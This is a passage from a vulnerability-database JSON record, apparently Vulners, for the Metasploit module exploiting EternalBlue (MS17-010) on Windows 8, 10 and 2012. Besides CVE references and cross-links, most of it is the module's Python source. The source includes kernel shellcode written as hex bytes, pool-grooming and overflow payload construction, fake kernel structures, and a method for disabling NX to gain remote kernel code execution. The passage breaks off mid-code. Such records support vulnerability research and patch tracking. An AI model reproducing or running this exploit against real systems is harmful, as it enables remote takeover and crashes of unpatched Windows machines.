Windows Kernel Pool Corruption for Win8+", "type": "metasploit", "viewCount": 49}, "differentElements": ["published", "modified"], "edition": 40, "lastseen": "2020-01-08T17:48:55"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "EternalBlue exploit for Windows 8, Windows 10, and 2012 by sleepya The exploit might FAIL and CRASH a target system (depended on what is overwritten) The exploit support only x64 target Tested on: \\- Windows 2012 R2 x64 \\- Windows 8.1 x64 \\- Windows 10 Pro Build 10240 x64 \\- Windows 10 Enterprise Evaluation Build 10586 x64 Default Windows 8 and later installation without additional service info: \\- anonymous is not allowed to access any share (including IPC$) \\- More info: https://support.microsoft.com/en-us/help/3034016/ipc-share-and-null-session-behavior-in-windows \\- tcp port 445 is filtered by firewall Reference: \\- http://blogs.360.cn/360safe/2017/04/17/nsa-eternalblue-smb/ \\- \"Bypassing Windows 10 kernel ASLR (remote) by Stefan Le Berre\" https://drive.google.com/file/d/0B3P18M-shbwrNWZTa181ZWRCclk/edit Exploit info: \\- If you do not know how exploit for Windows 7/2008 work. Please read my exploit for Windows 7/2008 at https://gist.github.com/worawit/bd04bad3cd231474763b873df081c09a because the trick for exploit is almost the same \\- The exploit use heap of HAL for placing fake struct (address 0xffffffffffd00e00) and shellcode (address 0xffffffffffd01000). On Windows 8 and Wndows 2012, the NX bit is set on this memory page. Need to disable it before controlling RIP. \\- The exploit is likely to crash a target when it failed \\- The overflow is happened on nonpaged pool so we need to massage target nonpaged pool. \\- If exploit failed but target does not crash, try increasing 'GroomAllocations' value (at least 5) \\- See the code and comment for exploit detail. Disable NX method: \\- The idea is from \"Bypassing Windows 10 kernel ASLR (remote) by Stefan Le Berre\" (see link in reference) \\- The exploit is also the same but we need to trigger bug twice \\- First trigger, set MDL.MappedSystemVa to target pte address \\- Write '\\x00' to disable the NX flag \\- Second trigger, do the same as Windows 7 exploit \\- From my test, if exploit disable NX successfully, I always get code execution\n", "enchantments": {"dependencies": {"modified": "2020-01-12T02:00:54", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"], "type": "metasploit"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603"], "type": "packetstorm"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0146", "MS:CVE-2017-0144", "MS:CVE-2017-0143", "MS:CVE-2017-0147"], "type": "mscve"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["THN:EA407B51944632C248FEB495594123EA", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}]}, "score": {"modified": "2020-01-12T02:00:54", "value": 7.7, "vector": "NONE"}}, "hash": "e2220776e8cde746959dfd4abe7c3c98", "history": [], "href": "", "id": "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "lastseen": "2020-01-12T02:00:54", "metasploitHistory": "", "metasploitReliability": "", "modified": "1976-01-01T00:00:00", "objectVersion": "1.4", "published": "1976-01-01T00:00:00", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://github.com/worawit/MS17-010", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146"], "reporter": "Rapid7", "sourceData": "#!/usr/bin/env python\n\nimport sys\nimport socket\nfrom struct import pack\nfrom base64 import b64decode\n\ntry:\n from impacket import smb, ntlm\nexcept ImportError:\n dependencies_missing = True\nelse:\n dependencies_missing = False\n\nfrom metasploit import module\n\nmetadata = {\n 'name': 'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+',\n 'description': '''\n EternalBlue exploit for Windows 8, Windows 10, and 2012 by sleepya\n The exploit might FAIL and CRASH a target system (depended on what is overwritten)\n The exploit support only x64 target\n\n Tested on:\n - Windows 2012 R2 x64\n - Windows 8.1 x64\n - Windows 10 Pro Build 10240 x64\n - Windows 10 Enterprise Evaluation Build 10586 x64\n\n\n Default Windows 8 and later installation without additional service info:\n - anonymous is not allowed to access any share (including IPC$)\n - More info: https://support.microsoft.com/en-us/help/3034016/ipc-share-and-null-session-behavior-in-windows\n - tcp port 445 is filtered by firewall\n\n\n Reference:\n - http://blogs.360.cn/360safe/2017/04/17/nsa-eternalblue-smb/\n - \"Bypassing Windows 10 kernel ASLR (remote) by Stefan Le Berre\" https://drive.google.com/file/d/0B3P18M-shbwrNWZTa181ZWRCclk/edit\n\n\n Exploit info:\n - If you do not know how exploit for Windows 7/2008 work. Please read my exploit for Windows 7/2008 at\n https://gist.github.com/worawit/bd04bad3cd231474763b873df081c09a because the trick for exploit is almost the same\n - The exploit use heap of HAL for placing fake struct (address 0xffffffffffd00e00) and shellcode (address 0xffffffffffd01000).\n On Windows 8 and Wndows 2012, the NX bit is set on this memory page. Need to disable it before controlling RIP.\n - The exploit is likely to crash a target when it failed\n - The overflow is happened on nonpaged pool so we need to massage target nonpaged pool.\n - If exploit failed but target does not crash, try increasing 'GroomAllocations' value (at least 5)\n - See the code and comment for exploit detail.\n\n\n Disable NX method:\n - The idea is from \"Bypassing Windows 10 kernel ASLR (remote) by Stefan Le Berre\" (see link in reference)\n - The exploit is also the same but we need to trigger bug twice\n - First trigger, set MDL.MappedSystemVa to target pte address\n - Write '\\\\x00' to disable the NX flag\n - Second trigger, do the same as Windows 7 exploit\n - From my test, if exploit disable NX successfully, I always get code execution\n ''',\n 'authors': [\n 'Equation Group', # OG research and exploit\n 'Shadow Brokers', # Hack and dump\n 'sleepya', # Research and PoC\n 'wvu' # Babby's first external module\n ],\n 'references': [\n {'type': 'msb', 'ref': 'MS17-010'},\n {'type': 'cve', 'ref': '2017-0143'},\n {'type': 'cve', 'ref': '2017-0144'},\n {'type': 'cve', 'ref': '2017-0145'},\n {'type': 'cve', 'ref': '2017-0146'},\n {'type': 'cve', 'ref': '2017-0147'},\n {'type': 'cve', 'ref': '2017-0148'},\n {'type': 'edb', 'ref': '42030'},\n {'type': 'url', 'ref': 'https://github.com/worawit/MS17-010'}\n ],\n 'date': 'Mar 14 2017',\n 'type': 'remote_exploit',\n 'rank': 'average',\n 'privileged': True,\n 'wfsdelay': 5,\n 'targets': [\n {'platform': 'win', 'arch': 'x64'}\n ],\n 'options': {\n 'RHOST': {'type': 'address', 'description': 'Target server', 'required': True, 'default': None},\n 'RPORT': {'type': 'port', 'description': 'Target server port', 'required': True, 'default': 445},\n 'ProcessName': {'type': 'string', 'description': 'Process to inject payload into.', 'required': False, 'default': 'spoolsv.exe'}, \n 'GroomAllocations': {'type': 'int', 'description': 'Initial number of times to groom the kernel pool.', 'required': True, 'default': 13},\n # if anonymous can access any share folder, 'IPC$' is always accessible.\n # authenticated user is always able to access 'IPC$'.\n # Windows 2012 does not allow anonymous to login if no share is accessible.\n 'SMBUser': {'type': 'string', 'description': '(Optional) The username to authenticate as', 'required': False, 'default': ''},\n 'SMBPass': {'type': 'string', 'description': '(Optional) The password for the specified username', 'required': False, 'default': ''}\n },\n 'notes': {\n 'AKA': ['ETERNALBLUE']\n }\n}\n\n\n\ndef hash(process): \n # calc_hash from eternalblue_kshellcode_x64.asm \n proc_hash = 0\n for c in str( process + \"\\x00\" ):\n proc_hash = ror( proc_hash, 13 )\n proc_hash += ord( c )\n return pack('<I', proc_hash)\n\ndef ror( dword, bits ):\n return ( dword >> bits | dword << ( 32 - bits ) ) & 0xFFFFFFFF\n\n# git clone https://github.com/worawit/MS17-010\n# cd MS17-010/shellcode\n# nasm -f bin eternalblue_kshellcode_x64.asm -o eternalblue_kshellcode_x64.bin\ndef eternalblue_kshellcode_x64(process=\"spoolsv.exe\"):\n proc_hash = hash(process)\n return (\n '\\x55\\xe8\\x2e\\x00\\x00\\x00\\xb9\\x82\\x00\\x00\\xc0\\x0f\\x32\\x4c\\x8d'\n '\\x0d\\x34\\x00\\x00\\x00\\x44\\x39\\xc8\\x74\\x19\\x39\\x45\\x00\\x74\\x0a'\n '\\x89\\x55\\x04\\x89\\x45\\x00\\xc6\\x45\\xf8\\x00\\x49\\x91\\x50\\x5a\\x48'\n '\\xc1\\xea\\x20\\x0f\\x30\\x5d\\xc3\\x48\\x8d\\x2d\\x00\\x10\\x00\\x00\\x48'\n '\\xc1\\xed\\x0c\\x48\\xc1\\xe5\\x0c\\x48\\x83\\xed\\x70\\xc3\\x0f\\x01\\xf8'\n '\\x65\\x48\\x89\\x24\\x25\\x10\\x00\\x00\\x00\\x65\\x48\\x8b\\x24\\x25\\xa8'\n '\\x01\\x00\\x00\\x6a\\x2b\\x65\\xff\\x34\\x25\\x10\\x00\\x00\\x00\\x50\\x50'\n '\\x55\\xe8\\xc5\\xff\\xff\\xff\\x48\\x8b\\x45\\x00\\x48\\x83\\xc0\\x1f\\x48'\n '\\x89\\x44\\x24\\x10\\x51\\x52\\x41\\x50\\x41\\x51\\x41\\x52\\x41\\x53\\x31'\n '\\xc0\\xb2\\x01\\xf0\\x0f\\xb0\\x55\\xf8\\x75\\x14\\xb9\\x82\\x00\\x00\\xc0'\n '\\x8b\\x45\\x00\\x8b\\x55\\x04\\x0f\\x30\\xfb\\xe8\\x0e\\x00\\x00\\x00\\xfa'\n '\\x41\\x5b\\x41\\x5a\\x41\\x59\\x41\\x58\\x5a\\x59\\x5d\\x58\\xc3\\x41\\x57'\n '\\x41\\x56\\x57\\x56\\x53\\x50\\x4c\\x8b\\x7d\\x00\\x49\\xc1\\xef\\x0c\\x49'\n '\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x66\\x41\\x81\\x3f\\x4d'\n '\\x5a\\x75\\xf1\\x4c\\x89\\x7d\\x08\\x65\\x4c\\x8b\\x34\\x25\\x88\\x01\\x00'\n '\\x00\\xbf\\x78\\x7c\\xf4\\xdb\\xe8\\x01\\x01\\x00\\x00\\x48\\x91\\xbf\\x3f'\n '\\x5f\\x64\\x77\\xe8\\xfc\\x00\\x00\\x00\\x8b\\x40\\x03\\x89\\xc3\\x3d\\x00'\n '\\x04\\x00\\x00\\x72\\x03\\x83\\xc0\\x10\\x48\\x8d\\x50\\x28\\x4c\\x8d\\x04'\n '\\x11\\x4d\\x89\\xc1\\x4d\\x8b\\x09\\x4d\\x39\\xc8\\x0f\\x84\\xc6\\x00\\x00'\n '\\x00\\x4c\\x89\\xc8\\x4c\\x29\\xf0\\x48\\x3d\\x00\\x07\\x00\\x00\\x77\\xe6'\n '\\x4d\\x29\\xce\\xbf\\xe1\\x14\\x01\\x17\\xe8\\xbb\\x00\\x00\\x00\\x8b\\x78'\n '\\x03\\x83\\xc7\\x08\\x48\\x8d\\x34\\x19\\xe8\\xf4\\x00\\x00\\x00\\x3d' + proc_hash +\n '\\x74\\x10\\x3d' + proc_hash + '\\x74\\x09\\x48\\x8b\\x0c' \n '\\x39\\x48\\x29\\xf9\\xeb\\xe0\\xbf\\x48\\xb8\\x18\\xb8\\xe8\\x84\\x00\\x00'\n '\\x00\\x48\\x89\\x45\\xf0\\x48\\x8d\\x34\\x11\\x48\\x89\\xf3\\x48\\x8b\\x5b'\n '\\x08\\x48\\x39\\xde\\x74\\xf7\\x4a\\x8d\\x14\\x33\\xbf\\x3e\\x4c\\xf8\\xce'\n '\\xe8\\x69\\x00\\x00\\x00\\x8b\\x40\\x03\\x48\\x83\\x7c\\x02\\xf8\\x00\\x74'\n '\\xde\\x48\\x8d\\x4d\\x10\\x4d\\x31\\xc0\\x4c\\x8d\\x0d\\xa9\\x00\\x00\\x00'\n '\\x55\\x6a\\x01\\x55\\x41\\x50\\x48\\x83\\xec\\x20\\xbf\\xc4\\x5c\\x19\\x6d'\n '\\xe8\\x35\\x00\\x00\\x00\\x48\\x8d\\x4d\\x10\\x4d\\x31\\xc9\\xbf\\x34\\x46'\n '\\xcc\\xaf\\xe8\\x24\\x00\\x00\\x00\\x48\\x83\\xc4\\x40\\x85\\xc0\\x74\\xa3'\n '\\x48\\x8b\\x45\\x20\\x80\\x78\\x1a\\x01\\x74\\x09\\x48\\x89\\x00\\x48\\x89'\n '\\x40\\x08\\xeb\\x90\\x58\\x5b\\x5e\\x5f\\x41\\x5e\\x41\\x5f\\xc3\\xe8\\x02'\n '\\x00\\x00\\x00\\xff\\xe0\\x53\\x51\\x56\\x41\\x8b\\x47\\x3c\\x41\\x8b\\x84'\n '\\x07\\x88\\x00\\x00\\x00\\x4c\\x01\\xf8\\x50\\x8b\\x48\\x18\\x8b\\x58\\x20'\n '\\x4c\\x01\\xfb\\xff\\xc9\\x8b\\x34\\x8b\\x4c\\x01\\xfe\\xe8\\x1f\\x00\\x00'\n '\\x00\\x39\\xf8\\x75\\xef\\x58\\x8b\\x58\\x24\\x4c\\x01\\xfb\\x66\\x8b\\x0c'\n '\\x4b\\x8b\\x58\\x1c\\x4c\\x01\\xfb\\x8b\\x04\\x8b\\x4c\\x01\\xf8\\x5e\\x59'\n '\\x5b\\xc3\\x52\\x31\\xc0\\x99\\xac\\xc1\\xca\\x0d\\x01\\xc2\\x85\\xc0\\x75'\n '\\xf6\\x92\\x5a\\xc3\\x55\\x53\\x57\\x56\\x41\\x57\\x49\\x8b\\x28\\x4c\\x8b'\n '\\x7d\\x08\\x52\\x5e\\x4c\\x89\\xcb\\x31\\xc0\\x44\\x0f\\x22\\xc0\\x48\\x89'\n '\\x02\\x89\\xc1\\x48\\xf7\\xd1\\x49\\x89\\xc0\\xb0\\x40\\x50\\xc1\\xe0\\x06'\n '\\x50\\x49\\x89\\x01\\x48\\x83\\xec\\x20\\xbf\\xea\\x99\\x6e\\x57\\xe8\\x65'\n '\\xff\\xff\\xff\\x48\\x83\\xc4\\x30\\x85\\xc0\\x75\\x45\\x48\\x8b\\x3e\\x48'\n '\\x8d\\x35\\x4d\\x00\\x00\\x00\\xb9\\x00\\x06\\x00\\x00\\xf3\\xa4\\x48\\x8b'\n '\\x45\\xf0\\x48\\x8b\\x40\\x18\\x48\\x8b\\x40\\x20\\x48\\x8b\\x00\\x66\\x83'\n '\\x78\\x48\\x18\\x75\\xf6\\x48\\x8b\\x50\\x50\\x81\\x7a\\x0c\\x33\\x00\\x32'\n '\\x00\\x75\\xe9\\x4c\\x8b\\x78\\x20\\xbf\\x5e\\x51\\x5e\\x83\\xe8\\x22\\xff'\n '\\xff\\xff\\x48\\x89\\x03\\x31\\xc9\\x88\\x4d\\xf8\\xb1\\x01\\x44\\x0f\\x22'\n '\\xc1\\x41\\x5f\\x5e\\x5f\\x5b\\x5d\\xc3\\x48\\x92\\x31\\xc9\\x51\\x51\\x49'\n '\\x89\\xc9\\x4c\\x8d\\x05\\x0d\\x00\\x00\\x00\\x89\\xca\\x48\\x83\\xec\\x20'\n '\\xff\\xd0\\x48\\x83\\xc4\\x30\\xc3'\n )\n\n# because the srvnet buffer is changed dramatically from Windows 7, I have to choose NTFEA size to 0x9000\nNTFEA_SIZE = 0x9000\n\nntfea9000 = (pack('<BBH', 0, 0, 0) + '\\x00')*0x260 # with these fea, ntfea size is 0x1c80\nntfea9000 += pack('<BBH', 0, 0, 0x735c) + '\\x00'*0x735d # 0x8fe8 - 0x1c80 - 0xc = 0x735c\nntfea9000 += pack('<BBH', 0, 0, 0x8147) + '\\x00'*0x8148 # overflow to SRVNET_BUFFER_HDR\n\n'''\nReverse from srvnet.sys (Win2012 R2 x64)\n- SrvNetAllocateBufferFromPool() and SrvNetWskTransformedReceiveComplete():\n\n// size 0x90\nstruct SRVNET_BUFFER_HDR {\n LIST_ENTRY list;\n USHORT flag; // 2 least significant bit MUST be clear. if 0x1 is set, pmdl pointers are access. if 0x2 is set, go to lookaside.\n char unknown0[6];\n char *pNetRawBuffer; // MUST point to valid address (check if this request is \"\\xfdSMB\")\n DWORD netRawBufferSize; // offset: 0x20\n DWORD ioStatusInfo;\n DWORD thisNonPagedPoolSize; // will be 0x82e8 for netRawBufferSize 0x8100\n DWORD pad2;\n char *thisNonPagedPoolAddr; // 0x30 points to SRVNET_BUFFER\n PMDL pmdl1; // point at offset 0x90 from this struct\n DWORD nByteProcessed; // 0x40\n char unknown4[4];\n QWORD smbMsgSize; // MUST be modified to size of all recv data\n PMDL pmdl2; // 0x50: if want to free corrupted buffer, need to set to valid address\n QWORD pSrvNetWskStruct; // want to change to fake struct address\n DWORD unknown6; // 0x60\n char unknown7[12];\n char unknown8[0x20];\n};\n\nstruct SRVNET_BUFFER {\n char transportHeader[80]; // 0x50\n char buffer[reqSize+padding]; // 0x8100 (for pool size 0x82f0), 0x10100 (for pool size 0x11000)\n SRVNET_BUFFER_HDR hdr; //some header size 0x90\n //MDL mdl1; // target\n};\n\nIn Windows 8, the srvnet buffer metadata is declared after real buffer. We need to overflow through whole receive buffer.\nBecause transaction max data count is 66512 (0x103d0) in SMB_COM_NT_TRANSACT command and\n DataDisplacement is USHORT in SMB_COM_TRANSACTION2_SECONDARY command, we cannot send large trailing data after FEALIST.\nSo the possible srvnet buffer pool size is 0x82f0. With this pool size, we need to overflow more than 0x8150 bytes.\nIf exploit cannot overflow to prepared SRVNET_BUFFER, the target is likely to crash because of big overflow.\n'''\n# Most field in overwritten (corrupted) srvnet struct can be any value because it will be left without free (memory leak) after processing\n# Here is the important fields on x64\n# - offset 0x18 (VOID*) : pointer to received SMB message buffer. This value MUST be valid address because there is\n# a check in SrvNetWskTransformedReceiveComplete() if this message starts with \"\\xfdSMB\".\n# - offset 0x48 (QWORD) : the SMB message length from packet header (first 4 bytes).\n# This value MUST be exactly same as the number of bytes we send.\n# Normally, this value is 0x80 + len(fake_struct) + len(shellcode)\n# - offset 0x58 (VOID*) : pointer to a struct contained pointer to function. the pointer to function is called when done receiving SMB request.\n# The value MUST point to valid (might be fake) struct.\n# - offset 0x90 (MDL) : MDL for describe receiving SMB request buffer\n# - 0x90 (VOID*) : MDL.Next should be NULL\n# - 0x98 (USHORT) : MDL.Size should be some value that not too small\n# - 0x9a (USHORT) : MDL.MdlFlags should be 0x1004 (MDL_NETWORK_HEADER|MDL_SOURCE_IS_NONPAGED_POOL)\n# - 0x90 (VOID*) : MDL.Process should be NULL\n# - 0x98 (VOID*) : MDL.MappedSystemVa MUST be a received network buffer address. Controlling this value get arbitrary write.\n# The address for arbitrary write MUST be subtracted by a number of sent bytes (0x80 in this exploit).\n#\n#\n# To free the corrupted srvnet buffer (not necessary), shellcode MUST modify some memory value to satisfy condition.\n# Here is related field for freeing corrupted buffer\n# - offset 0x10 (USHORT): 2 least significant bit MUST be clear. Just set to 0xfff0\n# - offset 0x30 (VOID*) : MUST be fixed to correct value in shellcode. This is the value that passed to ExFreePoolWithTag()\n# - offset 0x40 (DWORD) : be a number of total byte received. This field MUST be set by shellcode because SrvNetWskReceiveComplete() set it to 0\n# before calling SrvNetCommonReceiveHandler(). This is possible because pointer to SRVNET_BUFFER struct is passed to\n# your shellcode as function argument\n# - offset 0x50 (PMDL) : points to any fake MDL with MDL.Flags 0x20 does not set\n# The last condition is your shellcode MUST return non-negative value. The easiest way to do is \"xor eax,eax\" before \"ret\".\n# Here is x64 assembly code for setting nByteProcessed field\n# - fetch SRVNET_BUFFER address from function argument\n# \\x48\\x8b\\x54\\x24\\x40 mov rdx, [rsp+0x40]\n# - fix pool pointer (rcx is -0x8150 because of fake_recv_struct below)\n# \\x48\\x01\\xd1 add rcx, rdx\n# \\x48\\x89\\x4a\\x30 mov [rdx+0x30], rcx\n# - set nByteProcessed for trigger free after return\n# \\x8b\\x4a\\x48 mov ecx, [rdx+0x48]\n# \\x89\\x4a\\x40 mov [rdx+0x40], ecx\n\n# debug mode affects HAL heap. The 0xffffffffffd04000 address should be useable no matter what debug mode is.\n# The 0xffffffffffd00000 address should be useable when debug mode is not enabled\n# The 0xffffffffffd01000 address should be useable when debug mode is enabled\nTARGET_HAL_HEAP_ADDR = 0xffffffffffd04000 # for put fake struct and shellcode\n\n# Note: feaList will be created after knowing shellcode size.\n\n# feaList for disabling NX is possible because we just want to change only MDL.MappedSystemVa\n# PTE of 0xffffffffffd00000 is at 0xfffff6ffffffe800\n# NX bit is at PTE_ADDR+7\n# MappedSystemVa = PTE_ADDR+7 - 0x7f\nSHELLCODE_PAGE_ADDR = (TARGET_HAL_HEAP_ADDR + 0x400) & 0xfffffffffffff000\nPTE_ADDR = 0xfffff6ffffffe800 + 8*((SHELLCODE_PAGE_ADDR-0xffffffffffd00000) >> 12)\nfakeSrvNetBufferX64Nx = '\\x00'*16\nfakeSrvNetBufferX64Nx += pack('<HHIQ', 0xfff0, 0, 0, TARGET_HAL_HEAP_ADDR)\nfakeSrvNetBufferX64Nx += '\\x00'*16\nfakeSrvNetBufferX64Nx += '\\x00'*16\nfakeSrvNetBufferX64Nx += pack('<QQ', 0, 0)\nfakeSrvNetBufferX64Nx += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR) # _, _, pointer to fake struct\nfakeSrvNetBufferX64Nx += pack('<QQ', 0, 0)\nfakeSrvNetBufferX64Nx += '\\x00'*16\nfakeSrvNetBufferX64Nx += '\\x00'*16\nfakeSrvNetBufferX64Nx += pack('<QHHI', 0, 0x60, 0x1004, 0) # MDL.Next, MDL.Size, MDL.MdlFlags\nfakeSrvNetBufferX64Nx += pack('<QQ', 0, PTE_ADDR+7-0x7f) # MDL.Process, MDL.MappedSystemVa\n\nfeaListNx = pack('<I', 0x10000)\nfeaListNx += ntfea9000\nfeaListNx += pack('<BBH', 0, 0, len(fakeSrvNetBufferX64Nx)-1) + fakeSrvNetBufferX64Nx # -1 because first '\\x00' is for name\n# stop copying by invalid flag (can be any value except 0 and 0x80)\nfeaListNx += pack('<BBH', 0x12, 0x34, 0x5678)\n\n\ndef createFakeSrvNetBuffer(sc_size):\n # 0x180 is size of fakeSrvNetBufferX64\n totalRecvSize = 0x80 + 0x180 + sc_size\n fakeSrvNetBufferX64 = '\\x00'*16\n fakeSrvNetBufferX64 += pack('<HHIQ', 0xfff0, 0, 0, TARGET_HAL_HEAP_ADDR) # flag, _, _, pNetRawBuffer\n fakeSrvNetBufferX64 += pack('<QII', 0, 0x82e8, 0) # _, thisNonPagedPoolSize, _\n fakeSrvNetBufferX64 += '\\x00'*16\n fakeSrvNetBufferX64 += pack('<QQ', 0, totalRecvSize) # offset 0x40\n fakeSrvNetBufferX64 += pack('<QQ', TARGET_HAL_HEAP_ADDR, TARGET_HAL_HEAP_ADDR) # pmdl2, pointer to fake struct\n fakeSrvNetBufferX64 += pack('<QQ', 0, 0)\n fakeSrvNetBufferX64 += '\\x00'*16\n fakeSrvNetBufferX64 += '\\x00'*16\n fakeSrvNetBufferX64 += pack('<QHHI', 0, 0x60, 0x1004, 0) # MDL.Next, MDL.Size, MDL.MdlFlags\n fakeSrvNetBufferX64 += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR-0x80) # MDL.Process, MDL.MappedSystemVa\n return fakeSrvNetBufferX64\n\ndef createFeaList(sc_size):\n feaList = pack('<I', 0x10000)\n feaList += ntfea9000\n fakeSrvNetBuf = createFakeSrvNetBuffer(sc_size)\n feaList += pack('<BBH', 0, 0, len(fakeSrvNetBuf)-1) + fakeSrvNetBuf # -1 because first '\\x00' is for name\n # stop copying by invalid flag (can be any value except 0 and 0x80)\n feaList += pack('<BBH', 0x12, 0x34, 0x5678)\n return feaList\n\n# fake struct for SrvNetWskTransformedReceiveComplete() and SrvNetCommonReceiveHandler()\n# x64: fake struct is at ffffffff ffd00e00\n# offset 0x50: KSPIN_LOCK\n# offset 0x58: LIST_ENTRY must be valid address. cannot be NULL.\n# offset 0x110: array of pointer to function\n# offset 0x13c: set to 3 (DWORD) for invoking ptr to function\n# some useful offset\n# offset 0x120: arg1 when invoking ptr to function\n# offset 0x128: arg2 when invoking ptr to function\n#\n# code path to get code exection after this struct is controlled\n# SrvNetWskTransformedReceiveComplete() -> SrvNetCommonReceiveHandler() -> call fn_ptr\nfake_recv_struct = ('\\x00'*16)*5\nfake_recv_struct += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR+0x58) # offset 0x50: KSPIN_LOCK, (LIST_ENTRY to itself)\nfake_recv_struct += pack('<QQ', TARGET_HAL_HEAP_ADDR+0x58, 0) # offset 0x60\nfake_recv_struct += ('\\x00'*16)*10\nfake_recv_struct += pack('<QQ', TARGET_HAL_HEAP_ADDR+0x170, 0) # offset 0x110: fn_ptr array\nfake_recv_struct += pack('<QQ', (0x8150^0xffffffffffffffff)+1, 0) # set arg1 to -0x8150\nfake_recv_struct += pack('<QII', 0, 0, 3) # offset 0x130\nfake_recv_struct += ('\\x00'*16)*3\nfake_recv_struct 